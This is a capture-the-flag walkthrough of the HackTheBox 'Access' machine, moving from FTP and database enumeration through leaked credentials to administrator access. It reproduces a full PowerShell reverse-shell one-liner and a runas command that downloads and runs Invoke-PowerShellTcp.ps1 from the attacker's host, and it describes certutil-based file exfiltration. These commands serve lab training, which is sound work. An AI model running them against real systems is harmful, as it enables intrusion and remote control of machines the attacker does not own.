Access - HackTheBox Writeup
The link for this machine is located here: https://app.hackthebox.com/machines/156
This room contains FTP and web enumeration. From there, we find a database file and enumerate it, gaining a shell. Finally, some priv esc techniques are also discussed including some juicy PowerShell.
Full Walkthrough
First thing we can do is scan the machine with the following parameters:
-p- for all ports
10.10.10.98 for the target
-oN allports.scan to output to a file
This returns 3 ports open - FTP, Telnet and HTTP. To gather more information about these services, we can run a more detailed Nmap scan.
Not a lot of information is returned to us, but there is some useful information such as anonymous FTP login being allowed and Microsoft IIS 7.5 running on port 80.
A good first step is to check out the website running on the target.
Here, it looks like a live feed of some sort of server room. We can check the source code for anything potentially interesting.
There is nothing in the source code, but it does tell us that it is not an actual live feed, but rather a simple JPG image.
From here, we can try and run a tool like Feroxbuster on the website to try and find hidden directories.
Unfortunately, it finds nothing. As of right now, the website is a dead end.
Knowing this, we can try a different - such as FTP with the anonymous login.
It works and we can access the FTP share. Listing out the contents reveals two directories - Backups and Engineer.
Accessing the Backups directory, we see a “backup.mdb” file.
To download it, we can first set the FTP mode to binary and then use the “get” command to get a local copy of the file.
Then, we can navigate into the Engineer folder and see a ZIP file titled “Access Control.zip”
Once again, we can use the get command to download the ZIP.
From here, we should have two files downloaded from FTP - Access Control.zip and .
First, we can identify what type of file the backup.mdb is using the simple “file” command on Linux.
This reveals it to be a Microsoft Access Database. On Linux, we can use a tool called “mdb-tables” to list out the tables inside this database.
This lists out a ton of different tables. We can check a few and see what hides inside them using the “mdb-export” command, the database and the table we want to look at.
As we can see, these tables have columns. However, we don’t know if these tables actually include data or are just empty.
To find out in a quick efficient way, we can write a BASH one liner that will print out to us which tables actually have data contained inside them. The BASH one liner is as follows:
mdb-tables backup.mdb | tr ‘ ‘ ‘\n’ | grep . | while read table; do lines=$(mdb-export backup.mdb $table) | wc -l); if [ $lines -gt 1 ]; then echo “$table: $lines”; fi; done
As we can see, this reveals the tables that actually contain data inside them. Looking more closely, there is one that stands out as interesting - auth_user.
Knowing it contains data, we can take a deeper look at it using mdb-export once again.
Here, we get some potential credentials for admin, engineer and backup_admin - take note of these for now:
admin:admin
engineer:access4u@security
backup_admin:admin
Next, we can move on to analyze the ZIP file by first extracting it using 7z.
Unfortunately, it requires a password - remember those passwords we just found? Trying them out, it seems as though the engineer password (access4u@security) works and can successfully extract this ZIP.
Once extracted, we see it produces a “pst” file. I don’t know what a PST file is so once again, we can analyze it using the file command to see what it is.
It seems to be a simple Outlook email folder. Doing some research, I found a tool called “readpst” that allows us to read these type of files by first converting them to an inbox file.
Once converted, we can open it in any text editor and read the contents.
Bingo! We see an email to “security@accesscontrolsystems.com” saying that the “security” account password has been changed to 4Cc3ssC0ntr0ller.
We now have some new credentials:
security:4Cc3ssC0ntr0ller
With these credentials, there is one last port we can try these on - Telnet which is simply an unsecure version of SSH.
Telnet will hang for a few seconds after every command, but eventually it provides a login option. Providing the credentials we just found, we gain access to the system.
From here, we can navigate to the Desktop and grab the user flag.
Next, we can enumerate what users are on this system by listing the contents of the C:\Users directory.
We see the Administrator user is the only other user and we cannot navigate to it. From here, the Telnet connection becomes quite annoying to wait 5-10 seconds after every command is executed.
To speed it up and get a better shell, we can get a PowerShell reverse TCP connection.
First, we start a Netcat listener on port 4444.
Then, in our current Telnet session, we execute the massive PowerShell one-liner below:
powershell -command "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Once ran, we get a PowerShell shell on our Netcat listener.
With a more stable and faster shell, we can start enumerating further. A good place to look is inside the Public Users directory and just navigate through the different default folders - Documents, Downloads, Videos, etc…
After enumerating, we find a shortcut/link to something called ZKAccess3.5 Security System inside the C:\Users\Public\Documents directory.
From here, we can actually analyze LNK files by utilizing 3 lines inside PowerShell:
$WScript = New-Object -ComObject WScript.Shell
$SC = Get-ChildItem *.lnk
$WScript.CreateShortcut($sc)
This will provide some information about the LNK file.
The most important of this information is the arguments and the Target path. Here, we can see that the target path is actually the runas.exe executable and the arguments provided seem to login automatically with saved credentials for the Administrator and then runs the Access.exe.
The runas command allows us to run commands as another user and the option /savecred allows us to use the command without asking for password.
As a side note, if you didn’t have PowerShell, you could return most of the same information by using the “type” command on the LNK file - although not as clean an output.
From here, if we are going to execute this runas, we need to make sure that the Administrator user does not actually require the password by running the “net user” command.
Password required is set to No. If this was set to Yes we wouldn’t be able to use runas as administrator without knowing the password.
From here, we can use this to get another PowerShell shell running as Administrator. To do this, we first copy the Invoke-PowerShellTcp.ps1 script to our local directory.
Then, we can see at the bottom of the file, we add the following highlighted line which will get executed and connect back to us on port 443.
Second last step, we need to start a Python server in this directory so the target can download this PowerShell script.
Finally, we run the Netcat listener on port 443.
Then, we can execute it by running the following on the target machine:
runas /user:ACCESS\Administrator /savecred “powershell iex(new-object net.webclient).downloadstring(’http://10.10.14.14/Invoke-PowerShellTcp.ps1’)”
And, back on our Netcat listener, we get a juicy new PowerShell session this time running as the Administrator user!
From here, we can simply navigate to the Desktop and grab the root flag.
Extra, Extra, Come Learn a New Technique
Hey you…. don’t you want to learn a cool new trick to analyze LNK files on Linux? Sure you do, it’s fun!
Remembering back to when we analyze the LNK file using PowerShell - what happens if we don’t have PowerShell or the type command doesn’t work? Well, we can actually exfiltrate the LNK file to a Linux machine and analyze it there.
To do this, we run the certutil command with the encode parameter and encode the LNK file to a directory such as \users\security\appdata\local\temp\output which will produce base64 encoded content for us.
Just to make sure, we can check the contents of our newly created file.
Beautiful. With this, we can simply copy and paste this into a new file on our Linux machine (called lnk.b64) and use base64 -d to decode it to a new file called lnk.
Then from there, we can use a really cool tool called pylnker.py to analyze this LNK file - pretty cool right?
